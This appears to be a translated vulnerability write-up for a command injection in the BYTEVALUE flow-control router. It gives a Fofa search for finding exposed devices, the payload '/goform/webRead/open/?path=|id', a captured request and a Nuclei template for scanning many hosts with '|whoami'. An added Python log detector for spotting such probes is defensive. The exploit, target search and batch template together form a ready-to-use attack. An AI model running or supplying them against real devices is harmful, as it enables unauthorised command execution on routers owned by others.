Vulnerability description

BYTEVALUE Baiwei flow control is a multifunctional router that aims for a flawless Internet experience and maximum bandwidth utilisation; it takes its name, the Baiwei flow-control router, from its disruptive core feature, intelligent flow control. The path parameter of the /goform/webRead/open route of the Baiwei intelligent flow-control router has a command injection vulnerability. An attacker can use it to execute commands on the server side and gain control of the server.

Vulnerability reproduction

Step 1: use the following query to search for and identify the target...

# Fofa query

BYTEVALUE 智能流控路由器

Step 2: append the following path and request it; if the id command in the path is executed, the vulnerability is present.

# Path to append

/goform/webRead/open/?path=|id

Step 3: the following is the request captured with Burp Suite....

GET /goform/webRead/open/?path=|id HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
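For defenders, the request above is easy to pick out of web-server access logs: the path parameter of /goform/webRead/open should only ever carry a file name, so any shell metacharacter in it is a signal. The following detector is an added example, not part of the original write-up; the log lines are constructed in combined log format, and the metacharacter set and double-decoding step are assumptions about how such probes are typically obfuscated.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not taken from a real device.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /goform/webRead/open/?path=|id HTTP/1.1" 200 512
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /goform/webRead/open/?path=%7Cwhoami HTTP/1.1" 200 480
198.51.100.7 - - [10/Jan/2024:10:00:03 +0000] "GET /goform/webRead/open/?path=config.txt HTTP/1.1" 200 1024
198.51.100.7 - - [10/Jan/2024:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# Fields we need from each line: client IP, request URL and response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that have no business in a file name passed to this endpoint (assumed set).
SHELL_META = set("|;&`$\n")

VULN_PATH = "/goform/webRead/open"


def is_suspicious(url):
    """True if the URL targets the vulnerable route with shell metacharacters in `path`."""
    parts = urlsplit(url)
    if not parts.path.startswith(VULN_PATH):
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get("path", []):
        # parse_qs already decodes once; decode again to catch double-encoded probes.
        decoded = unquote(value)
        if any(ch in SHELL_META for ch in decoded):
            return True
    return False


def scan_log(text):
    """Return (ip, url, status) for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_suspicious(m["url"]):
            hits.append((m["ip"], m["url"], m["status"]))
    return hits


if __name__ == "__main__":
    for ip, url, status in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {url}")
```

A 200 status on a flagged request is the strongest indicator, since the page notes the command output is returned in the response body.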

Batch script


id: Bytevalue-Route

info:
  name: Bytevalue-Route
  author: Ph9ar
  severity: high
  description: description
  reference:
    - https://4pts.online
  tags: rce

requests:
  - raw:
      - |+
        GET /goform/webRead/open/?path=|whoami HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - admin
      - type: status
        status:
          - 200